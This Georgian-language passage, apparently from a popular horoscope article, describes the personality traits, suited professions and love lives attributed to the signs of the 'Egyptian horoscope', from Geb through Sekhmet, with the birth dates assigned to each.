გადაჭარბებული ემოციებისა და შიშების მიუხედავად, ისინი ყველაფერს აკეთებენ, რათა მიაღწიონ სულიერ წონასწორობასა და მყარ კავშირს საკუთარ პარტნიორთან.
გები (12-29 თებერვალი, 20-31 აგვისტო)
გების ნიშნის ქვეშ დაბადებული ადამიანები კეთილები და კარგი მრჩეველები არიან, მათ კარგად ესმით სხვა ადამიანების. მათ შორის ბევრი საზოგადო მოღვაწე, ფსიქოლოგი და ტექნიკის სფეროში მოღვაწე ადამიანია. რასაც ისინი ხელს მოკიდებენ, ყველაფერი ყვავის, რადგან რაც კი პლანეტაზე მწვანეა, მათ ძალითა და ენერგიით ავსებს. ისინი ფლეგმატურები არიან, რაც იმის მიზეზია, რომ არ შეუძლიათ აჩქარება და ფუსფუსი. გებები მგრძნობიარენი, შთაბეჭდილების მომხდენნი და კეთილშობილები არიან, ისინი მეგობრებში და კოლეგებში დიდი ნდობით სარგებლობენ, ამის გამო ისინი ესწრაფვიან გებებს საკუთარი პრობლემები გაუზიარონ, რადგან დარწმუნებული არიან, რომ გებების კეთილი რჩევა მათ ცხოვრებას სასიკეთოდ შეცვლის. პირად ცხოვრებაში გებები მოკრძალებულები არიან და ეძებენ ისეთივე თვისებების ადამიანს, როგორებიც თავად არიან, მგრძნობიარეს, სანდოსა და ენერგიულს.
ისიდა (11-31 მარტი, 18-29 ოქტომბერი, 19-31 დეკემბერი)
ისიდას ნიშნის ქვეშ დაბადებული ადამიანების (განსაკუთრებით ქალების) ძირითად არსი სიყვარულია, ისინი სითბოს და სიკეთეს ასხივებენ, თუმცა ამასთან ერთად ზუსტად იციან რა უნდათ ცხოვრებისგან, ვარსკვლავები მათ პედაგოგიკაში და ეკონომიკაში წარმატებებს უწინასწარმეტყველებენ. ისიდებს განსაკუთრებული ნიჭი აქვთ ნებისმიერ საქმეში წარმატებას მიაღწიონ, ამაში მათ ვერანაირი უარყოფითი ძალა ხელს ვერ უშლის. ისინი სიცოცხლისმოყვარულები, გახსნილები და ამბიციურები არიან, უყვართ ექსპერიმენტები და ცხოვრობენ ყოველგვარი ცრურწმენებისა და სინდისის ქეჯნის გარეშე. ისიდები მშვიდები, მიმნდომები და გულუხვები არიან, უყვართ ადამიანები და თავადაც ენდობიან მათ. პირად ცხოვრებაში ისინი დიდი და ხანგრძლივი სიყვარულით გამოირჩევიან, ხელს უწყობენ ოჯახური ცხოვრების გახალისებას სასიამოვნო (ხანდახან არც ისე), სიურპრიზებით. თუმცა ისეთი იდეალისტები არიან, რომ ერთხელ, პარტნიორთან იმედგაცრუების შემთხვევაში, იმედი უცრუვდებათ და სხვა პარტნიორის ძებნას, მარტო ცხოვრებას არჩევენ ხოლმე.
ოსირისი (1-10 მარტი, 27-30 ნოემბერი, 1-18 დეკემბერი)
ოსირისის ნიშნის ქვეშ დაბადებულები შესანიშნავი ორატორები და ორგანიზატორები არიან, ადამიანის შეცნობის დიდი ნიჭით არიან დაჯილდოებული, ზოგჯერ შესაძლებელია მათზე იფიქრონ, რომ აზრების გამოცნობა შეუძლიათ, რადგან მათგან რამის დამალვა თითქმის შეუძლებელია. ხასიათის მიხედვით ოსირისები ცნობისმოყვარენი არიან. უყვართ ახალი, უჩვეულო და მოულოდნელი ექსპერიმენტები. ისინი საკუთარ თავში დარწმუნებულები არიან, არ ეშინიათ, რომ მარცხს განიცდიან, რადგან ყოველთვის იტოვებენ სათადარიგო სვლას, რათა შეძლონ სიტუაციის გამოსწორება. თუმცა მათი ასეთი ენერგიულობა და ოპტიმიზმი გადაღლასაც იწვევს, რამაც შესაძლოა ზოგჯერ მსუბუქი დეპრესიაც კი გამოიწვიოს. ოსირისებს არ უყვართ, როცა რომელიმე მნიშვნელოვანი მოვლენა მათ გარეშე ხდება. ისინი წარმატებით უთავსებენ ერთმანეთს ძალასა და სიფაქიზეს, მგზნებარებასა და ალტრუიზმს. პირად ცხოვრებაში ისინი სტაბილურები არიან, თუმცა ზოგჯერ მგზნებარე მეგობრობა უფრო შეუძლიათ, ვიდრე სიყვარული.
თოტი (1-19 აპრილი, 8-17 ნოემბერი)
ტოტის ნიშნის ქვეშ დაბადებულები დეტალებისადმი განსაკუთრებული ყურადღებით, ანალიზისა და ლოგიკური აზროვნების უნარით გამოირჩევიან. მათ შორის გვხვდებიან განსაკუთრებული ნიჭით, ჰიპნოზის უნარით დაჯილდოებული ადამიანები, რომლებსაც შეუძლიათ ნებისმიერი პიროვნება ნებისმირ საკითხში მარტივად დაარწმუნონ. ამისათვის კი საკმარისია მოსაუბრეს თვალებში უყურონ. სიმართლის ტყუილისგან გარჩევა თოტებს რამოდენიმე წამში შეუძლიათ.
ხასიათის მიხედვით თოტები გულუხვები და პატიოსნები არიან, მათ კარგად გამოდით პედაგოგობა და არ უჭირთ ცხოვრებაში ისეთი პროფესიის პოვნა, რომელიც სიამოვნებას ანიჭებთ და რომელსაც მთელი სიცოცხლე ემსახურებიან თოტები ცნობისმოყვარენი არიან, ისინი მუდამ ახალის და შეუცნობელის შესწავლისაკენ მიისწრაფვიან. ამასთან ერთად თავმდაბლები რჩებიან და საკუთარ უპირატესობას არავის აგრძნობინებენ. ისინი წარმატებით უმკლავდებიან ყველა წინააღმდეგობას, რომლის წინაშეც ცხოვრება აყენებთ და ყოვეთვის ცდილობენ ჭეშმარიტების დადგენას. პირად ცხოვრებაში თოტები დელიკატურები და მოწესრიგებულები არიან, მათ შეუძლიათ პარტნიორს მისცენ ყველაფერი საუკეთესო, რაც გააჩნიათ, თუმცა ამავე დროს ოსტატურად შეუძლიათ შენიღბონ საკუთარი ნაკლი.
ჰორი (ჰოროსი) 1-7 მაისი, 20-30 აპრილი, 12-19 აგვისტო
ჰორის ნიშნის ქვეშ დაბადებულ ადამიანებს შესანიშნავი ფანტაზია და მდიდარი წარმოსახვის უნარი აქვთ, რის გამოც ისინი კარგად ახერხებენ საკუთარი თავის რეალიზებას შემოქმედებით პროფესიებში. მათ შორის არიან კარგი მუსიკოსები, ბიოლოგები, ზოოლოგები. განსაკუთრებულია მათი ურთიერთობა ცხოველებთან, რომლებიც სიხარულით რეაგირებენ ჰორების ბრძანებებზე. ალერსით თუ სიმკაცრით, მათ ნებისმიერი მხეცის მოთვინიერება შეუძლიათ. ხასიათის მიხედვით, ჰორები სიცოცხლის სიყვარულით, კეთილშობილებით და ჯანმრთელი პრაგმატიზმით გამოირჩევიან. საკუთარ მიზნებს ისინი ნათლად უყურებენ, ამიტომ მათ მიღწევაში პრობლემები ნაკლებად ექმნებათ ხოლმე. გარდა ამისა არ ეშინიათ მძიმე სამუშაოსი, პირიქით, იზიდავთ კიდეც ის. უყვართ რისკი და არ გაურბიან პასუხისმგებლობას. ამავდროულად დარწმუნებული არიან საკუთარ თავში. უყვართ მართვა, ყველაფრის კონტროლი, ასეთ დროს ისინი ნაკლებად ტაქტიანები არიან, აკლიათ მოთმინება და დიპლომატია. პირად ცხოვრებაში ჰორებს თავისუფლად შეიძლება ერთი ნახვით შეუყვარდეთ, თუმცა მათი გრძნობა დროებითი და მყიფეა, სერიოზული გრძნობა გამოცდილების და ხანგრძლივი ურთიერთკავშირის შემდეგ მოდის.
ანუბისი (8-27 მაისი, 29-30 ივნისი, 1-13 ივლისი)
ანუბისის ნიშნის ქვეშ დაბადებული ადამიანები ხასიათდებიან შავი იუმორის გრძნობით, მათ შეუძლიათ ნებისმიერ, ურთულეს სიტუაციაშიც კი იუმორის მომენტები დაინახონ. ანუბისები ადამიანი "ბუები" არიან, მათ უყვართ გვიან დაძინება და გვიან გაღვიძება. ხმაურიან თავყრილობებს განმარტოებას ამჯობინებენ ხოლმე. სამსახურში ან ნებისმიერ სხვა სიტუაციაში ისინი პრობლემას მარტონი უფრო ართმევენ თავს, ვიდრე გუნდურად. ანუბისები სიმართლის მოყვარულები არიან, მათ სამართლის აღსრულების ნიჭი აქვთ. მათგან სიმართლის დამალვა ძნელია. ისინი ყოველთვის იცავენ სუსტებს და სჯიან დამნაშავეებს. ისინი სინათლეს - ჩრდილს, ხოლო პოპულარობას - მარტოობას ამჯობინებენ. ძალიან ბევრი ადამიანი, ანუბისებს იდუმალ პიროვნებებად მიიჩნევს, მაგრამ მიუხედავად ამისა ალღოს, გულახდილობისა და ერთგულების გამო, მათ აფასებენ. ანუბისები ცოტათი იდეალისტები და ძალიან ემოციურები არიან, ამიტომ დროდადრო დეპრესიაში ვარდებიან, თუმცა შეიძლება სწორედ ეს ეხმარება მათ გარკვეული პრობლემების გადაწყვეტაში. ისინი შესანიშნავი ფსიქოლოგები არიან, ამიტომ ის რაც სხვებისთვის გამოცანაა, მათთვის საიდუმლოს არ წარმოადგენს. ანუბისები შეუდრეკელები არიან და არ ცვლიან ერთხელ მიღებულ გადაწყვეტილებას, რაც პრობლემებს უქმნით პირად ურთიერთობებში. ამიტომ მათ პარტნიორის შერჩევა უჭირთ და ამ საკითხს განსაკუთრებული სიფრთხილით უდგებიან.
სეთი (28-31 მაისი, 1-18 ივნისი, 28-30 სექტემბერი, 1-2 ოქტომბერი)
სეთის ნიშნის ქვეშ დაბადებულები ძალიან ამბიციურები, საკუთარ თავში და სიმართლეში დარწმუნებული ადამიანები არიან. ისინი ხშირად გვევლინებიან პოლიტიკოსებად და გვხვდებიან ხელისუფლების მაღალ ეშელონებში.
მათ განსაკუთრებულ ნიჭი აქვთ გამოიცნონ მომავალი, დიდ მნიშვნელობას ანიჭებენ ბედის ნიშნებს და მკითხავებს. სეთებს არ ეშინიათ წინააღმდეგობების, რადგან იციან, რომ მათი გადალახვა აუცილებელია და ამას აზარტით აკეთებენ. ისინი ვერ სწავლობენ წარსულ შეცდომებზე და ხშირად იმეორებენ მას. მუდამ აქვთ მოთხოვნილება წამოიწყონ რამე ახალი. შინაგან სიმშვიდეს კი შინაგან პარადოქსებთან ბრძოლით პოულობენ. სეთებს ხშირად ეჩვენებათ, რომ შეუძლიათ დაეყრდნონ მხოლოდ საკუთარ თავს. ვერ იტანენ შეზღუდვებს პროფესიულ, სოციალურ და სასიყვარულო სფეროებში. საკუთარი ეგოიზმით ისინი თავს იცავენ ისეთი მოვლენებისგან, რამაც შეიძლება დარტყმა მიაყენოთ. დროდადრო კი გაქცევასაც ამჯობინებენ, რათა არ დაკარგონ თავისუფლება. პირად ურთიერთობებში, სეთებს ძალიან უჭირთ საკუთარი ეჭვიანობის კონტროლი და შეგნებულად ირჩევენ ისეთ პარტნიორებს, რომლებიც თვალებს დახუჭავენ ასეთ თვისებაზე და მათ იმპულსურ მოქმედებას, მოწონებითაც კი შეხედავენ.
ბასტეტი (14-28 ივლისი, 23-27 სექტემბერი, 3-17 ოქტომბერი)
ბასტეტის ნიშნის ქვეშ დაბადებულები, მიმზიდველები და მომხიბვლელები არიან, მათ შეუძლიათ რეალურად, ზუსტად შეაფასონ და შეიგრძნონ სიტუაცია. ბასტეტები იდეალური მეუღლეები და დედები არიან. ისინი ადვილად აღწევენ წარმატებას ქალურ პროფესიებში. მათგან გამოდიან შესანიშნავი მასწავლებლები, მედდები, ბუნებისდამცველები, ბუღალტერები და ა.შ, ისინი შესანიშნავად კერავენ, ქსოვენ, საუცხოო კულინარები არიან. ბასტეტებს ადამიანების დამშვიდებისა და სტრესის მოხსნის განსაკუთრებული უნარი აქვთ, გააცნიათ გასაოცარი, მყუდრო, ბიოველი, რომელიც ათბობს და ამშვიდებს გარშემომყოფთ, ხოლო დიპლომატია, შარმი, გრაცია და სიუხვე მიმზიდველს ხდის მათ პერსონას. ხასიათის მიხედვით ბასტეტები ყურადღებიანები და ფრთხილები არიან, მათ კარგად შეუძლიათ თავის დაცვა ნებისმიერ სიტუაციაში, თუმცა გადაჭარბებული სიფხიზლე ზოგჯერ ხელს უშლით სიტუაციის სწორად შეფასებაში. ზედმეტი მოკრძალებულება კი არ აძლევთ საშუალებას, ბოლომდე გაეხსნან სამყაროს და ცხოვრება უფრო ნათელი და საინტერესო გახდეს. კარგად განვითარებული ინტუიციის და ტაქტის გრძნობის გამო მათ ხშირად მიმართავენ რჩევებისთვის და არც ცდებიან, რადგან ბასტეტებს ყველასთვის მოეძებნება საჭირო რჩევები. პირად ცხოვრებაში ბასტეტები ერთგულები და თავდადებულები არიან, ისინი ეძებენ ისეთ პარტნიორებს, რომლებიც შეძლებენ მათი მგრძნობიარე ხასიათისა და ემოციურობის გათვალისწინებას
სეხმეტი (29-31 ივლისი, 1-11 აგვისტო, 30 ოქტომბერი - 7 ნოემბერი)
სეხმეტის ნიშნის ქვეშ დაბადებულები ადამიანები დიდი ავტორიტეტით სარგებლობენ, ისინი ძალიან მომთხოვნები არიან, როგორც საკუთარ თავთან, ასევე სხვებთან მიმართებაში. ხასიათდებიან ერთნაირი ნიჭით ნებისმიერ პროფესიაში, სადაც უხდებათ ხალხთან ურთიერთობა და გადაწყვეტილებების მიღება. იღბალი მათი გამორჩეული იარაღია, ისინი ყოველთვის საჭირო დროს საჭირო ადგილზე აღმოჩნდებიან ხოლმე და რა საქმესაც არ უნდა მოკიდონ ხელი, წარმატება მათი მეგზურია. ისინი თმის ღერიდან ფრჩხილებამდე, მომავალი პერფექციონისტები არიან, ამიტომ დაუკმაყოფილებლოიბის გრძნობა მუდამ თან სდევთ, თუმცა მეტი მოქნილიობა, ფანტაზია და ნაკლები თვითკრიტიკა გაცილებით მარტივს გახდიდა მათთვის ცხოვრებას. ხასიათის მიხედვით სეხმეტები ამაყი, შეუდრეკელი და ტემპერამენტიანები არიან. მათ ბევრი მეგობრები ყავთ, თუმცა ყოველთვის არ არიან შემწყნარებლები მათ მიმართ. ისინი კარგად აკონტროლებენ საკუთარ თავს, ამიტომ ნაკლებად უშვებენ შეცდომებს. პირად ცხოვრებაში სეხმეტების გარეგნული სიამაყის მიღმა პატიოსანი და მგრძნობიარე ნატურა იმალება, ისინი ძალიან ფრთხილები არიან პარტნიორებთან ურთიერთობებში, განსაკუთრებულად უდგებიან და უფრთხილდებიან მათთან ურთიერთობას.